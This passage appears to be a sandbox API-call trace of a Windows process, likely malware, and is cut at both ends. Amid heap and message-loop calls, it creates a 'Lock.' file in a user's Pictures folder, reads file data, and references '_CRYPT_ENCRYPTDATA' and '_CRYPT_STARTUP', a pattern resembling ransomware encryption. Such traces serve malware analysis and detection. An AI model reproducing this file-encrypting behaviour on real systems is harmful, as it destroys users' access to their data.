(HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0251.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0251.288] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0251.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0251.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0251.289] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0251.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0251.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0251.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0251.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0251.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0251.291] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.NU6pYHrnfbris-w219Y.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.nu6pyhrnfbris-w219y.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0251.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0251.292] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0251.292] TranslateMessage (lpMsg=0x8cf708) returned 0 [0251.292] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0251.292] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0251.295] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0251.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0251.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0251.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0251.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0251.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0251.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0251.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0251.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0251.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe55020 [0251.297] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0251.297] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0251.301] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x1ef3, lpOverlapped=0x0) returned 1 [0251.301] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0251.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0251.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0251.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0251.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11ef3) returned 0x2f14010 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0251.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0251.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11ef3) returned 0x2f25f10 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11ef3) returned 0x2f14010 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0251.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0251.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0251.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0251.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0251.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0251.306] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0251.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0251.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54df8 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11ef3) returned 0x2f14010 [0251.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e48 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0251.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0251.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e88 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e98 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0251.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11ef3) returned 0x2f37e10 [0251.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0251.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0251.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0251.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0251.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0251.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0251.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0251.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0251.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0251.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0251.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0251.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0251.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0251.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0251.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0251.312] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.313] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0251.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0251.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0251.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 